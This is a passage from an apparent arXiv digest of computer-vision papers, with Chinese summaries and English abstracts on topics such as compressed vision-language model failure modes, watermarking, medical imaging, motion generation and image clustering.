Abstract:Bridge infrastructure inspection is a critical but labor-intensive task requiring expert assessment of structural damage such as rebar exposure, cracking, and corrosion. This paper presents a comprehensive study of quantized Vision-Language Models (VLMs) for automated bridge damage assessment, focusing on the trade-offs between description quality, inference speed, and resource requirements. We develop an end-to-end pipeline combining LLaVA-1.5-7B for visual damage analysis, structured JSON extraction, and rule-based priority scoring. To enable deployment on consumer-grade GPUs, we conduct a systematic comparison of three quantization levels: Q4_K_M, Q5_K_M, and Q8_0 across 254 rebar exposure images. We introduce a 5-point quality evaluation framework assessing damage type recognition, severity classification. Our results demonstrate that Q5_K_M achieves the optimal balance: quality score 3.18 \pm 1.35/5.0, inference time 5.67s/image, and 0.56 quality/sec efficiency – 8.5% higher quality than Q4_K_M with only 4.5% speed reduction, while matching Q8_0’s quality with 25% faster inference. Statistical analysis reveals Q5_K_M exhibits the weakest text-quality correlation (-0.148), indicating consistent performance regardless of description length.
[CV-275] Edge Reliability Gap in Vision-Language Models: Quantifying Failure Modes of Compressed VLMs Under Visual Corruption
【速读】:该论文旨在解决大视觉语言模型(Vision-Language Models, VLMs)在边缘部署时因压缩导致的失效模式差异问题,即紧凑模型是否仅更频繁地失败,还是以不同方式失败。研究通过对比一个70亿参数量化模型(Qwen2.5-VL-7B, 4-bit NF4)与一个5亿参数FP16模型(SmolVLM2-500M),在VQAv2和COCO Captions数据集上共4000个样本中识别其错误类型,提出三类诊断性错误分类框架(Object Blindness、Semantic Drift、Prior Bias),并结合文本判别器(GPT-4o)、置信度校准(Expected Calibration Error, ECE)、结构化否定探测(structured negation probes)以及模糊鲁棒性实验进行系统评估。关键发现是:紧凑模型表现出定性不同的失效特征——尤其在COCO数据集上,SmolVLM2-500M在否定推理任务中出现显著更高的“否定崩溃”(negation collapse,-33.2pp vs. -20.8pp),且在特定模板(false_yn)下错误率高达100%,远高于Qwen模型的14%;这表明压缩不仅影响性能,还会引入新的、可预测的错误模式,这对边缘部署前的安全审计具有重要意义。
链接: https://arxiv.org/abs/2603.26769
作者: Mehmet Kaan Erol
机构: Marmara University, Institute of Pure and Applied Sciences (马尔马拉大学纯与应用科学研究所)
类目: Computer Vision and Pattern Recognition (cs.CV); Artificial Intelligence (cs.AI)
备注: 16 pages, 5 figures
Abstract:The rapid compression of large vision-language models (VLMs) for edge deployment raises an underexplored question: do compact models fail differently, not merely more often? This study compares a 7-billion-parameter quantised VLM (Qwen2.5-VL-7B, 4-bit NF4) against a 500-million-parameter FP16 model (SmolVLM2-500M) across 4,000 samples from VQAv2 and COCO Captions. A three-category error taxonomy (Object Blindness, Semantic Drift, Prior Bias) is applied as a diagnostic framework. A text-only GPT-4o judge reveals Semantic Drift (B) as the dominant failure mode on VQAv2 and on COCO for Qwen, with a mixed Object Blindness / Semantic Drift profile for SmolVLM2 on COCO; Prior Bias © is present on VQAv2 but absent on COCO for both models. Confidence calibration is measured via Expected Calibration Error (ECE) using geometric mean token probability, compositional reasoning is probed with structured negation probes across four templates, and a blur robustness experiment completes the evaluation. For this model pair, the compact model exhibits a qualitatively distinct failure signature: a 12.5pp larger negation collapse (-33.2pp vs. -20.8pp, Wald 95% CI [8.2, 16.8]pp, p 10^-8), driven almost entirely by COCO while the VQAv2 gap is not statistically significant (4.5pp, p=0.19). The most discriminating template is false_yn: SMOLVLM2-500M responds “Yes” (incorrectly claiming a depicted object is absent) on 100% of COCO trials vs. 14% for Q WEN 2.5-VL-7B. Asymmetric dataset-dependent miscalibration and a blur experiment with two controlled ablations complete the analysis. The fully reproducible pipeline is released for systematic safety auditing of compressed VLMs prior to edge deployment.
[CV-276] A training-free framework for high-fidelity appearance transfer via diffusion transformers
【速读】:该论文旨在解决扩散模型(Diffusion Models)中基于参考图像的可控编辑问题,特别是针对扩散 Transformer(DiT)架构在注入局部外观时易破坏整体场景结构的挑战。其解决方案的关键在于提出首个无需训练的框架,通过解耦结构与外观的协同系统实现高保真度的外观迁移:首先利用高保真反演建立源图像的内容先验(包含光照和微纹理信息),再设计一种新颖的注意力共享机制,动态融合来自参考图像的净化外观特征,并由几何先验引导融合过程,从而在不损害结构完整性的情况下实现精确的外观控制。
链接: https://arxiv.org/abs/2603.26767
作者: Shengrong Gu,Ye Wang,Song Wu,Rui Ma,Qian Wang,Lanjun Wang,Zili Yi
机构: 未知
类目: Computer Vision and Pattern Recognition (cs.CV)
备注:
Abstract:Diffusion Transformers (DiTs) excel at generation, but their global self-attention makes controllable, reference-image-based editing a distinct challenge. Unlike U-Nets, naively injecting local appearance into a DiT can disrupt its holistic scene structure. We address this by proposing the first training-free framework specifically designed to tame DiTs for high-fidelity appearance transfer. Our core is a synergistic system that disentangles structure and appearance. We leverage high-fidelity inversion to establish a rich content prior for the source image, capturing its lighting and micro-textures. A novel attention-sharing mechanism then dynamically fuses purified appearance features from a reference, guided by geometric priors. Our unified approach operates at 1024px and outperforms specialized methods on tasks ranging from semantic attribute transfer to fine-grained material application. Extensive experiments confirm our state-of-the-art performance in both structural preservation and appearance fidelity.
[CV-277] JND-Guided Neural Watermarking with Spatial Transformer Decoding for Screen-Capture Robustness
【速读】:该论文旨在解决屏幕拍摄鲁棒水印(screen-shooting robust watermarking)中高提取准确率与良好视觉质量难以兼得的问题。其核心挑战在于屏幕显示与相机拍摄过程中引入的复杂且交织的退化,如莫尔条纹(Moiré patterns)、色域偏移、透视畸变和传感器噪声等。解决方案的关键在于提出一个端到端的深度学习框架,通过三项创新实现:(i) 一种全面的噪声模拟层,能够物理驱动地建模真实屏幕拍摄失真,尤其是引入了莫尔条纹生成器,使网络在对抗训练中学习对捕获通道噪声的鲁棒表示;(ii) 基于刚可觉察失真(Just Noticeable Distortion, JND)的感知损失函数,自适应调节嵌入强度,将水印能量集中于人眼不敏感区域以最大化视觉质量;(iii) 两个互补的自动定位模块——基于语义分割的前景提取器用于图像校正,以及对称噪声模板机制用于抗裁剪区域恢复,从而在实际部署条件下实现全自动水印解码。
链接: https://arxiv.org/abs/2603.26766
作者: Jiayi Qin,Jingwei Li,Chuan Wu
机构: Zhejiang Gongshang University (浙江工商大学)
类目: Computer Vision and Pattern Recognition (cs.CV)
备注:
Abstract:Screen-shooting robust watermarking aims to imperceptibly embed extractable information into host images such that the watermark survives the complex distortion pipeline of screen display and camera recapture. However, achieving high extraction accuracy while maintaining satisfactory visual quality remains an open challenge, primarily because the screen-shooting channel introduces severe and entangled degradations including Moiré patterns, color-gamut shifts, perspective warping, and sensor noise. In this paper, we present an end-to-end deep learning framework that jointly optimizes watermark embedding and extraction for screen-shooting robustness. Our framework incorporates three key innovations: (i) a comprehensive noise simulation layer that faithfully models realistic screen-shooting distortions – notably including a physically-motivated Moiré pattern generator – enabling the network to learn robust representations against the full spectrum of capture-channel noise through adversarial training; (ii) a Just Noticeable Distortion (JND) perceptual loss function that adaptively modulates watermark embedding strength by supervising the perceptual discrepancy between the JND coefficient map and the watermark residual, thereby concentrating watermark energy in perceptually insensitive regions to maximize visual quality; and (iii) two complementary automatic localization modules – a semantic-segmentation-based foreground extractor for captured image rectification and a symmetric noise template mechanism for anti-cropping region recovery – that enable fully automated watermark decoding under realistic deployment conditions. Extensive experiments demonstrate that our method achieves an average PSNR of 30.94~dB and SSIM of 0.94 on watermarked images while embedding 127-bit payloads.
[CV-278] Low Dose CT for Stroke Diagnosis: A Dual Pipeline Deep Learning Framework for Portable Neuroimaging
【速读】:该论文旨在解决便携式CT扫描仪在院前及资源匮乏环境中进行早期脑卒中(stroke)检测时,因降低辐射剂量导致图像噪声增加、进而影响诊断可靠性的问题。其核心解决方案是提出一种基于深度学习的框架,用于从模拟低剂量CT(low-dose CT, LDCT)脑部图像中实现卒中分类,以支持移动临床环境下的AI辅助分诊。关键创新在于对比两种处理流程:一是直接对噪声LDCT图像进行分类,二是先去噪再分类,并通过多剂量水平下的准确率(accuracy)、敏感性(sensitivity)和AUC指标评估性能。研究发现,尽管去噪能提升图像感知质量,但并不总是提高分类性能;在某些场景下,直接分类反而具有更高敏感性,揭示了图像感知质量与诊断实用性之间的权衡关系。最优的“去噪-分类”流程在中等剂量下达到0.94 AUC和0.91准确率,较直接分类提升最多达6%,为LDCT卒中分诊提供了可复现的基准,并强调了未来需在缺血性卒中队列和真实便携式CT设备上进一步验证。
链接: https://arxiv.org/abs/2603.26764
作者: Rhea Ghosal,Ronok Ghosal,Eileen Lou
机构: 未知
类目: Computer Vision and Pattern Recognition (cs.CV)
备注: 13 pages, 4 figures, 3 tables. Includes dose-level evaluation and robustness stress tests (motion and ring artifacts). Code and dataset based on RSNA Intracranial Hemorrhage Detection
Abstract:Portable CT scanners enable early stroke detection in prehospital and low-resource settings but require reduced radiation doses, introducing noise that degrades diagnostic reliability. We present a deep learning framework for stroke classification from simulated low-dose CT (LDCT) brain scans for AI-assisted triage in mobile clinical environments. Controlled Poisson noise is applied to high-dose CT images to simulate realistic LDCT conditions. We compare two pipelines: (1) direct classification of noisy LDCT images and (2) denoising followed by classification. Performance is evaluated across multiple dose levels using accuracy, sensitivity, and AUC. While denoising improves perceptual image quality, it does not consistently improve classification. In several settings, direct classification yields higher sensitivity, revealing a trade-off between perceptual quality and diagnostic utility. The best denoise-then-classify pipeline achieves 0.94 AUC and 0.91 accuracy at moderate dose levels, outperforming direct classification by up to 6% in select cases. This work establishes a reproducible baseline for LDCT stroke triage using hemorrhagic stroke data (RSNA dataset) and highlights the need for validation on ischemic cohorts and real-world portable CT systems. Comments: 13 pages, 4 figures, 3 tables. Includes dose-level evaluation and robustness stress tests (motion and ring artifacts). Code and dataset based on RSNA Intracranial Hemorrhage Detection Subjects: Computer Vision and Pattern Recognition (cs.CV) MSC classes: 68T07, 92C55 ACMclasses: I.2.6; I.2.10; J.3 Cite as: arXiv:2603.26764 [cs.CV] (or arXiv:2603.26764v1 [cs.CV] for this version) https://doi.org/10.48550/arXiv.2603.26764 Focus to learn more arXiv-issued DOI via DataCite (pending registration)
[CV-279] A Near-Raw Talking-Head Video Dataset for Various Computer Vision Tasks
【速读】:该论文旨在解决实时通信中说话头视频(talking-head videos)数据集稀缺且信号保真度低的问题。现有公开数据集在规模和质量上均难以支撑高质量视频压缩与增强模型的训练与评估。其解决方案的关键在于开源了一个近原始(near-raw)的 talking-head 视频数据集,包含 847 条约 212 分钟、每条 15 秒的录制片段,来自 805 名参与者使用 446 台消费级网络摄像头在自然环境中采集,所有视频均采用 FFV1 无损编码保存,保留了相机原生信号(未压缩或 MJPEG 编码),并附带主观质量评分(MOS)及 10 个感知质量标签,可解释 64.4% 的 MOS 方差。此外,研究还构建了一个分层基准子集用于压缩效率评估,并通过多编码器(H.264、H.265、H.266、AV1)对比实验揭示内容类型与背景处理对压缩效率存在显著交互效应(η² = 0.112–0.149),从而为视频压缩与增强模型提供了高保真、大规模、结构化的新基准资源。
链接: https://arxiv.org/abs/2603.26763
作者: Babak Naderi,Ross Cutler
机构: 未知
类目: Computer Vision and Pattern Recognition (cs.CV); Multimedia (cs.MM); Image and Video Processing (eess.IV)
备注:
Abstract:Talking-head videos constitute a predominant content type in real-time communication, yet publicly available datasets for video processing research in this domain remain scarce and limited in signal fidelity. In this paper, we open-source a near-raw dataset of 847 talking-head recordings (approximately 212 minutes), each 15,s in duration, captured from 805 participants using 446 unique consumer webcam devices in their natural environments. All recordings are stored using the FFV1 lossless codec, preserving the camera-native signal – uncompressed (24.4%) or MJPEG-encoded (75.6%) – without additional lossy processing. Each recording is annotated with a Mean Opinion Score (MOS) and ten perceptual quality tokens that jointly explain 64.4% of the MOS variance. From this corpus, we curate a stratified benchmarking subset of 120 clips in three content conditions: original, background blur, and background replacement. Codec efficiency evaluation across four datasets and four codecs, namely H.264, H.265, H.266, and AV1, yields VMAF BD-rate savings up to -71.3% (H.266) relative to H.264, with significant encoder \times dataset ( \eta_p^2 = .112 ) and encoder \times content condition ( \eta_p^2 = .149 ) interactions, demonstrating that both content type and background processing affect compression efficiency. The dataset offers 5 \times the scale of the largest prior talking-head webcam dataset (847 vs.\ 160 clips) with lossless signal fidelity, establishing a resource for training and benchmarking video compression and enhancement models in real-time communication.
[CV-280] ny-ViT: A Compact Vision Transformer for Efficient and Explainable Potato Leaf Disease Classification
【速读】:该论文旨在解决马铃薯叶片病害(如早疫病和晚疫病)早期精准识别难题,以减少因传统人工检测方法耗时、易出错而导致的产量损失和农药滥用问题。其解决方案的关键在于提出了一种轻量级且高效的视觉Transformer(Vision Transformer, ViT)模型——Tiny-ViT,该模型在资源受限系统中仍能实现高精度分类(测试准确率达99.85%),并通过图像预处理(包括CLAHE增强与高斯模糊)提升输入质量,同时具备低计算开销、强泛化能力(MCC=0.9990)及可解释性(基于GRAD-CAM定位病灶区域),从而为田间实时病害监测提供了可靠的技术路径。
链接: https://arxiv.org/abs/2603.26761
作者: Shakil Mia,Umme Habiba,Urmi Akter,SK Rezwana Quadir Raisa,Jeba Maliha,Md. Iqbal Hossain,Md. Shakhauat Hossan Sumon
机构: 未知
类目: Computer Vision and Pattern Recognition (cs.CV); Artificial Intelligence (cs.AI)
备注: Accepted and Presented Paper at the 2026 IEEE International Conference on Electrical, Computer and Telecommunication Engineering, Rajshahi, Bangladesh
Abstract:Early and precise identification of plant diseases, especially in potato crops is important to ensure the health of the crops and ensure the maximum yield . Potato leaf diseases, such as Early Blight and Late Blight, pose significant challenges to farmers, often resulting in yield losses and increased pesticide use. Traditional methods of detection are not only time-consuming, but are also subject to human error, which is why automated and efficient methods are required. The paper introduces a new method of potato leaf disease classification Tiny-ViT model, which is a small and effective Vision Transformer (ViT) developed to be used in resource-limited systems. The model is tested on a dataset of three classes, namely Early Blight, Late Blight, and Healthy leaves, and the preprocessing procedures include resizing, CLAHE, and Gaussian blur to improve the quality of the image. Tiny-ViT model has an impressive test accuracy of 99.85% and a mean CV accuracy of 99.82% which is better than baseline models such as DEIT Small, SWIN Tiny, and MobileViT XS. In addition to this, the model has a Matthews Correlation Coefficient (MCC) of 0.9990 and narrow confidence intervals (CI) of [0.9980, 0.9995], which indicates high reliability and generalization. The training and testing inference time is competitive, and the model exhibits low computational expenses, thereby, making it applicable in real-time applications. Moreover, interpretability of the model is improved with the help of GRAD-CAM, which identifies diseased areas. Altogether, the proposed Tiny-ViT is a solution with a high level of robustness, efficiency, and explainability to the problem of plant disease classification.
[CV-281] An Intelligent Framework for Real-Time Yoga Pose Detection and Posture Correction
【速读】:该论文旨在解决自导式或在线瑜伽训练中因姿势执行不当而导致训练效果降低及肌肉骨骼损伤风险增加的问题。其核心解决方案是提出一种基于边缘智能(Edge AI)的混合框架,关键在于融合轻量级人体姿态估计模型与生物力学特征提取,并采用CNN-LSTM时序学习架构来识别瑜伽体式并分析动作动态;通过计算关节角度和骨骼特征并与标准姿态配置对比,实现对姿势正确性的量化评估,并结合视觉、文本和语音反馈机制提供实时矫正指导,同时利用模型量化与剪枝等优化技术确保在资源受限设备上的低延迟运行。
链接: https://arxiv.org/abs/2603.26760
作者: Chandramouli Haldar
机构: 未知
类目: Computer Vision and Pattern Recognition (cs.CV)
备注:
Abstract:Yoga is widely recognized for improving physical fitness, flexibility, and mental well being. However, these benefits depend strongly on correct posture execution. Improper alignment during yoga practice can reduce effectiveness and increase the risk of musculoskeletal injuries, especially in self guided or online training environments. This paper presents a hybrid Edge AI based framework for real time yoga pose detection and posture correction. The proposed system integrates lightweight human pose estimation models with biomechanical feature extraction and a CNN LSTM based temporal learning architecture to recognize yoga poses and analyze motion dynamics. Joint angles and skeletal features are computed from detected keypoints and compared with reference pose configurations to evaluate posture correctness. A quantitative scoring mechanism is introduced to measure alignment deviations and generate real time corrective feedback through visual, text based, and voice based guidance. In addition, Edge AI optimization techniques such as model quantization and pruning are applied to enable low latency performance on resource constrained devices. The proposed framework provides an intelligent and scalable digital yoga assistant that can improve user safety and training effectiveness in modern fitness applications.
[CV-282] Physics-Aware Diffusion for LiDAR Point Cloud Densification
【速读】:该论文旨在解决LiDAR感知中远距离目标因点云稀疏而导致的性能下降问题,同时克服现有生成式扩散模型在重建过程中存在的高延迟和物理幻觉(如鬼影点)缺陷。其解决方案的关键在于将点云稠密化视为概率性精修而非生成过程,通过在粗略先验上应用部分扩散(Partial Diffusion, SDEdit),实现仅需156ms即可获得高保真结果;此外,引入射线一致性损失(Ray-Consistency loss)与负向射线增强(Negative Ray Augmentation),从物理层面约束生成过程以抑制伪影,从而在KITTI-360和nuScenes数据集上达到当前最优效果,并可直接提升现成3D检测器性能而无需重新训练。
链接: https://arxiv.org/abs/2603.26759
作者: Zeping Zhang,Robert Laganière
机构: University of Ottawa (渥太华大学)
类目: Computer Vision and Pattern Recognition (cs.CV)
备注:
Abstract:LiDAR perception is severely limited by the distance-dependent sparsity of distant objects. While diffusion models can recover dense geometry, they suffer from prohibitive latency and physical hallucinations manifesting as ghost points. We propose Scanline-Consistent Range-Aware Diffusion, a framework that treats densification as probabilistic refinement rather than generation. By leveraging Partial Diffusion (SDEdit) on a coarse prior, we achieve high-fidelity results in just 156ms. Our novel Ray-Consistency loss and Negative Ray Augmentation enforce sensor physics to suppress artifacts. Our method achieves state-of-the-art results on KITTI-360 and nuScenes, directly boosting off-the-shelf 3D detectors without retraining. Code will be made available.
[CV-283] GradAttn: Replacing Fixed Residual Connections with Task-Modulated Attention Pathways
【速读】:该论文旨在解决深度卷积神经网络(Deep ConvNets)在增加网络深度时出现的梯度信号退化问题,该问题限制了复杂架构中的有效特征学习。传统残差网络(ResNet)通过固定短路连接缓解此问题,但其无法根据输入复杂度自适应调整梯度流或选择性强化任务相关特征。解决方案的关键在于提出GradAttn框架——一种混合CNN-Transformer结构,用注意力机制控制梯度流动,替代固定的残差连接。该方法通过多尺度CNN特征提取与自注意力调节,动态加权浅层纹理特征和深层语义表示,从而实现可学习的梯度调控,显著提升模型泛化能力并验证了注意力机制作为梯度控制新范式的有效性。
链接: https://arxiv.org/abs/2603.26756
作者: Soudeep Ghoshal,Himanshu Buckchash
机构: Kalinga Institute of Industrial Technology (凯林加工业技术学院); IMC University of Applied Sciences Krems (IMC应用科学大学克雷姆斯分校)
类目: Computer Vision and Pattern Recognition (cs.CV)
备注: 14 pages, 5 figures. Under review
Abstract:Deep ConvNets suffer from gradient signal degradation as network depth increases, limiting effective feature learning in complex architectures. ResNet addressed this through residual connections, but these fixed short-circuits cannot adapt to varying input complexity or selectively emphasize task relevant features across network hierarchies. This study introduces GradAttn, a hybrid CNN-transformer framework that replaces fixed residual connections with attention-controlled gradient flow. By extracting multi-scale CNN features at different depths and regulating them through self-attention, GradAttn dynamically weights shallow texture features and deep semantic representations. For representational analysis, we evaluated three GradAttn variants across eight diverse datasets, from natural images, medical imaging, to fashion recognition. Results demonstrate that GradAttn outperforms ResNet-18 on five of eight datasets, achieving up to +11.07% accuracy improvement on FashionMNIST while maintaining comparable network size. Gradient flow analysis reveals that controlled instabilities, introduced by attention, often coincide with improved generalization, challenging the assumption that perfect stability is optimal. Furthermore, positional encoding effectiveness proves dataset dependent, with CNN hierarchies frequently encoding sufficient spatial structure. These findings allow attention mechanisms as enablers of learnable gradient control, offering a new paradigm for adaptive representation learning in deep neural architectures.
[CV-284] Domain-Guided YOLO26 with Composite BCE-Dice-Lovász Loss for Multi-Class Fetal Head Ultrasound Segmentation
【速读】:该论文旨在解决产前超声图像中胎儿头部结构分割的难题,这是妇产科影像分析中的一个实际瓶颈。现有最优基线方法虽基于Segment Anything Model并引入每类Dice与Lovász损失,但仍需在测试时依赖边界框提示(bounding-box prompts)。其核心解决方案是构建了一个无需提示(prompt-free)的端到端管道,基于YOLO26-Seg模型实现脑部(Brain)、透明隔腔(Cavum Septi Pellucidi, CSP)和侧脑室(Lateral Ventricles, LV)三结构的联合检测与分割,仅需单次前向传播。关键创新包括:(i) 引入复合BCE-Dice-Lovász损失函数并结合逆频率类别加权,通过运行时猴子补丁(monkey-patching)嵌入YOLO26训练流程;(ii) 域引导的复制粘贴增强策略,在尊重CSP和LV相对于脑边界解剖位置的前提下移植少数类结构;(iii) 采用患者间分层划分(inter-patient stratified splitting)以避免数据泄露。实验表明,该方法在575张测试图像上达到0.9253的平均Dice系数,较基线提升2.68个百分点,且仅针对三个前景类别,而基线包含易分背景类。
链接: https://arxiv.org/abs/2603.26755
作者: M. Fazri Nizar
机构: 未知
类目: Computer Vision and Pattern Recognition (cs.CV)
备注:
Abstract:Segmenting fetal head structures from prenatal ultrasound remains a practical bottleneck in obstetric imaging. The current state-of-the-art baseline, proposed alongside the published dataset, adapts the Segment Anything Model with per-class Dice and Lovász losses but still depends on bounding-box prompts at test time. We build a prompt-free pipeline on top of YOLO26-Seg that jointly detects and segments three structures, Brain, Cavum Septi Pellucidi (CSP), and Lateral Ventricles (LV), in a single forward pass. Three modifications are central to our approach: (i) a composite BCE-Dice-Lovász segmentation loss with inverse-frequency class weighting, injected into the YOLO26 training loop via runtime monkey-patching; (ii) domain-guided copy-paste augmentation that transplants minority-class structures while respecting their anatomical location relative to the brain boundary; and (iii) inter-patient stratified splitting to prevent data leakage. On 575 held-out test images, the composite loss variant reaches a mean Dice coefficient of 0.9253, exceeding the baseline (0.9012) by 2.68 percentage points, despite reporting over three foreground classes only, whereas the baseline’s reported mean includes the easy background class. We further ablate each component and discuss annotation-quality and class-imbalance effects on CSP and LV performance.
[CV-285] Generating Synthetic Wildlife Health Data from Camera Trap Imagery: A Pipeline for Alopecia and Body Condition Training Data
【速读】:该论文旨在解决野生动物健康监测中缺乏可用于机器学习(Machine Learning, ML)的公开标注数据集的问题,这限制了自动化健康筛查技术的发展。其核心解决方案是构建一个合成训练图像生成流水线,通过从真实相机陷阱(camera trap)图像中提取基础样本,并利用生成式表型编辑系统生成具有可控严重程度的毛发脱落(alopecia)和体重下降(body condition deterioration)症状图像,同时采用自适应场景漂移质量控制机制确保生成图像的真实性与可用性。关键创新在于将生成数据明确视为筛查数据源,而非完全替代真实数据,并通过模拟到真实(sim-to-real)迁移实验验证了仅使用合成数据即可实现0.85 AUROC的分类性能,表明所生成图像能够有效捕捉用于健康筛查的视觉特征。
链接: https://arxiv.org/abs/2603.26754
作者: David Brundage
机构: University of Wisconsin - Madison, School of Veterinary Medicine (威斯康星大学麦迪逊分校兽医学院)
类目: Computer Vision and Pattern Recognition (cs.CV); Artificial Intelligence (cs.AI)
备注:
Abstract:No publicly available, ML ready datasets exist for wildlife health conditions in camera trap imagery, creating a fundamental barrier to automated health screening. We present a pipeline for generating synthetic training images depicting alopecia and body condition deterioration in wildlife from real camera trap photographs. Our pipeline constructs a curated base image set from iWildCam using MegaDetector derived bounding boxes and center frame weighted stratified sampling across 8 North American species. A generative phenotype editing system produces controlled severity variants depicting hair loss consistent with mange and emaciation. An adaptive scene drift quality control system uses a sham prefilter and decoupled mask then score approach with complementary day or night metrics to reject images where the generative model altered the original scene. We frame the pipeline explicitly as a screening data source. From 201 base images across 4 species, we generate 553 QC passing synthetic variants with an overall pass rate of 83 percent. A sim to real transfer experiment training exclusively on synthetic data and testing on real camera trap images of suspected health conditions achieves 0.85 AUROC, demonstrating that the synthetic data captures visual features sufficient for screening.
[CV-286] Survey on Remote Sensing Scene Classification: From Traditional Methods to Large Generative AI Models
【速读】:该论文旨在解决遥感场景分类方法从传统手工特征提取向现代人工智能系统演进过程中存在的技术瓶颈与研究空白问题,特别是如何提升模型在低标注数据、跨域泛化和多模态融合等方面的性能。其解决方案的关键在于系统梳理了从经典纹理描述符到深度学习架构(如卷积神经网络、视觉Transformer、图神经网络)再到当前前沿的自监督基础模型和生成式AI(Generative AI)方法的发展脉络,并强调通过合成数据生成和高级特征学习策略来应对标注成本高、可解释性差及伦理挑战等现实障碍,从而推动遥感场景分类向更高效、鲁棒和可持续的方向发展。
链接: https://arxiv.org/abs/2603.26751
作者: Qionghao Huang,Can Hu
机构: South China Normal University (华南师范大学); Zhejiang Normal University (浙江师范大学)
类目: Computer Vision and Pattern Recognition (cs.CV)
备注: Accepted in Journal of King Saud University Computer and Information Sciences
Abstract:Remote sensing scene classification has experienced a paradigmatic transformation from traditional handcrafted feature methods to sophisticated artificial intelligence systems that now form the backbone of modern Earth observation applications. This comprehensive survey examines the complete methodological evolution, systematically tracing development from classical texture descriptors and machine learning classifiers through the deep learning revolution to current state-of-the-art foundation models and generative AI approaches. We chronicle the pivotal shift from manual feature engineering to automated hierarchical representation learning via convolutional neural networks, followed by advanced architectures including Vision Transformers, graph neural networks, and hybrid frameworks. The survey provides in-depth coverage of breakthrough developments in self-supervised foundation models and vision-language systems, highlighting exceptional performance in zero-shot and few-shot learning scenarios. Special emphasis is placed on generative AI innovations that tackle persistent challenges through synthetic data generation and advanced feature learning strategies. We analyze contemporary obstacles including annotation costs, multimodal data fusion complexities, interpretability demands, and ethical considerations, alongside current trends in edge computing deployment, federated learning frameworks, and sustainable AI practices. Based on comprehensive analysis of recent advances and gaps, we identify key future research priorities: advancing hyperspectral and multi-temporal analysis capabilities, developing robust cross-domain generalization methods, and establishing standardized evaluation protocols to accelerate scientific progress in remote sensing scene classification systems.
[CV-287] From Diffusion To Flow: Efficient Motion Generation In MotionGPT 3 ICLR2026
【速读】:该论文旨在解决连续潜空间文本驱动动作生成中,扩散模型(diffusion)与修正流(rectified flow)训练目标在收敛速度、推理效率及生成质量上的差异问题。其解决方案的关键在于,在保持模型架构、训练协议和评估设置一致的前提下,通过受控的实证研究对比两种生成目标在MotionGPT3框架下的表现,从而明确修正流是否能在动作生成任务中继承其在图像和音频生成中的优势。实验表明,修正流不仅收敛更快、早期性能更优,且在不同采样步数下稳定性更强,实现了更高的效率-质量权衡,验证了训练目标选择对运动先验建模的重要性。
链接: https://arxiv.org/abs/2603.26747
作者: Jaymin Ban,JiHong Jeon,SangYeop Jeong
机构: Seoul National University of Science and Technology (首尔科学技术大学)
类目: Computer Vision and Pattern Recognition (cs.CV); Machine Learning (cs.LG)
备注: ReALM-GEN Workshop ICLR 2026
Abstract:Recent text-driven motion generation methods span both discrete token-based approaches and continuous-latent formulations. MotionGPT3 exemplifies the latter paradigm, combining a learned continuous motion latent space with a diffusion-based prior for text-conditioned synthesis. While rectified flow objectives have recently demonstrated favorable convergence and inference-time properties relative to diffusion in image and audio generation, it remains unclear whether these advantages transfer cleanly to the motion generation setting. In this work, we conduct a controlled empirical study comparing diffusion and rectified flow objectives within the MotionGPT3 framework. By holding the model architecture, training protocol, and evaluation setup fixed, we isolate the effect of the generative objective on training dynamics, final performance, and inference efficiency. Experiments on the HumanML3D dataset show that rectified flow converges in fewer training epochs, reaches strong test performance earlier, and matches or exceeds diffusion-based motion quality under identical conditions. Moreover, flow-based priors exhibit stable behavior across a wide range of inference step counts and achieve competitive quality with fewer sampling steps, yielding improved efficiency–quality trade-offs. Overall, our results suggest that several known benefits of rectified flow objectives do extend to continuous-latent text-to-motion generation, highlighting the importance of the training objective choice in motion priors.
[CV-288] DEC: Deep Embedded Image Clustering with Transformer and Distribution Information
【速读】:该论文旨在解决现有深度聚类方法(Deep Clustering, DC)在处理高维图像数据时,忽视不同图像区域间全局信息融合以及所学特征对聚类不友好(如维度冗余、仅依赖简单距离信息)的问题。解决方案的关键在于提出一种名为TDEC的新型深度嵌入图像聚类框架,其核心创新包括:引入Transformer结构构建T-Encoder模块以学习具有全局依赖关系的判别性特征;设计Dim-Reduction块生成利于聚类的低维空间;并在聚类过程中考虑嵌入特征的分布信息,为联合训练提供可靠的监督信号,从而显著提升复杂图像数据上的聚类性能。
链接: https://arxiv.org/abs/2603.26746
作者: Ruilin Zhang,Haiyang Zheng,Hongpeng Wang
机构: Harbin Institute of Technology, Shenzhen(哈尔滨工业大学深圳校区); Peng Cheng Laboratory(鹏城实验室)
类目: Computer Vision and Pattern Recognition (cs.CV); Machine Learning (cs.LG)
备注:
Abstract:Image clustering is a crucial but challenging task in multimedia machine learning. Recently the combination of clustering with deep learning has achieved promising performance against conventional methods on high-dimensional image data. Unfortunately, existing deep clustering methods (DC) often ignore the importance of information fusion with a global perception field among different image regions on clustering images, especially complex ones. Additionally, the learned features are usually clustering-unfriendly in terms of dimensionality and are based only on simple distance information for the clustering. In this regard, we propose a deep embedded image clustering TDEC, which for the first time to our knowledge, jointly considers feature representation, dimensional preference, and robust assignment for image clustering. Specifically, we introduce the Transformer to form a novel module T-Encoder to learn discriminative features with global dependency while using the Dim-Reduction block to build a friendly low-dimensional space favoring clustering. Moreover, the distribution information of embedded features is considered in the clustering process to provide reliable supervised signals for joint training. Our method is robust and allows for more flexibility in data size, the number of clusters, and the context complexity. More importantly, the clustering performance of TDEC is much higher than recent competitors. Extensive experiments with state-of-the-art approaches on complex datasets show the superiority of TDEC.
[CV-289] Motion Semantics Guided Normalizing Flow for Privacy-Preserving Video Anomaly Detection ICME2026
【速读】:该论文旨在解决骨架表示的视频异常检测(Skeleton-based Video Anomaly Detection, VAD)中因现有方法以整体方式建模连续运动轨迹而无法有效捕捉人类活动的层次化语义结构与细粒度动作差异的问题,导致在不同抽象层级上异常表现的判别能力不足。其解决方案的关键在于提出Motion Semantics Guided Normalizing Flow (MSG-Flow),通过三阶段架构实现分层建模:首先使用向量量化变分自编码器(Vector Quantized Variational Auto-Encoder, VQ-VAE)将连续运动离散化为可解释的动作基元;其次利用自回归Transformer建模语义层级的时间依赖关系;最后采用条件归一化流(Conditional Normalizing Flow)捕获细节层级的姿态变化,从而在多个抽象层次上增强对异常行为的感知能力。
链接: https://arxiv.org/abs/2603.26745
作者: Yang Liu,Boan Chen,Yuanyuan Meng,Jing Liu,Zhengliang Guo,Wei Zhou,Peng Sun,Hong Chen
机构: Tongji Univ.(同济大学); SJTU(上海交通大学); Shanghai Creative Studies Institute(上海创意研究院); UBC(不列颠哥伦比亚大学); Fudan Univ.(复旦大学); Cardiff Univ.(卡迪夫大学); DKU(昆山杜克大学)
